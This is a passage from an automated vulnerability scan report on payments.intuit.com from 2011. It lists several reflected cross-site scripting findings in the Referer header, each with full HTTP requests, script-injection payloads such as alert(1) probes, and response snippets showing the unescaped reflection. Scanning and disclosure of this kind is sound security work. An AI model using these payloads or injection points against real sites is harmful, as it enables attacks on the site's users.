Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=3c927--><script>alert(1)</script>c31793869de

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=+O5vTWSpUYzZ0cAiwOULPg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:40 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96023F60A0805192AA117E3C0B449FB
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcheck_002dservice_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 109460


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=3c927--><script>alert(1)</script>c31793869de | -->
...[SNIP]...

1.33. http://payments.intuit.com/products/echecks-and-check-processing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/echecks-and-check-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 88c20--><script>alert(1)</script>924f3a86d14 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=88c20--><script>alert(1)</script>924f3a86d14

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:06:08 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=rblhe1EyqVTlvVVwvVfbCg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:09 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9617F910A0805192AA117E356453B1F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145489


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=88c20--><script>alert(1)</script>924f3a86d14 | -->
...[SNIP]...

1.34. http://payments.intuit.com/products/echecks-and-check-processing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/echecks-and-check-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8442e'-alert(1)-'9e35c41500 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=8442e'-alert(1)-'9e35c41500

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:06:03 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=3N8dnzIcpHCCR4yazTOqzQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:04 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9616AE30A0805192AA117E35222B8A8
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145455


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=8442e'-alert(1)-'9e35c41500';
                   </script>
...[SNIP]...

1.35. http://payments.intuit.com/products/internet-merchant-accounts.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/internet-merchant-accounts.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 13789--><script>alert(1)</script>c6658a6c597 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=13789--><script>alert(1)</script>c6658a6c597

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:20 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=RHjF1WYshpdtziLMdwBPsw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:21 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FD8DC0A0805192AA117E3A718C091
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116417


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=13789--><script>alert(1)</script>c6658a6c597 | -->
...[SNIP]...

1.36. http://payments.intuit.com/products/internet-merchant-accounts.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/internet-merchant-accounts.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51516'-alert(1)-'1ab853b004d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=51516'-alert(1)-'1ab853b004d

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:01 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=UrCbcswIPLaXgenjtn1JyA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:02 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F8FAC0A0805192AA117E3E1625670
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116386


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=51516'-alert(1)-'1ab853b004d';
                   </script>
...[SNIP]...

1.37. http://payments.intuit.com/products/online-credit-card-processing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/online-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 189b5'-alert(1)-'d3b08e9e2f1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=189b5'-alert(1)-'d3b08e9e2f1

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:37 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=nsY-E9JullWuK3Fo-MwMpA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:38 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96105730A0805192AA117E3D6C3D6DF
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116174


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=189b5'-alert(1)-'d3b08e9e2f1';
                   </script>
...[SNIP]...

1.38. http://payments.intuit.com/products/online-credit-card-processing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/online-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 18139--><script>alert(1)</script>e22e5c6761f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=18139--><script>alert(1)</script>e22e5c6761f

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:47 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=iJGjLaqLPGZAre+7IVia6A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:48 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9612C450A0805192AA117E36B59CC68
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116206


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=18139--><script>alert(1)</script>e22e5c6761f | -->
...[SNIP]...

1.39. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-credit-card-processing-services.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f7c47--><script>alert(1)</script>3f78b487239 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
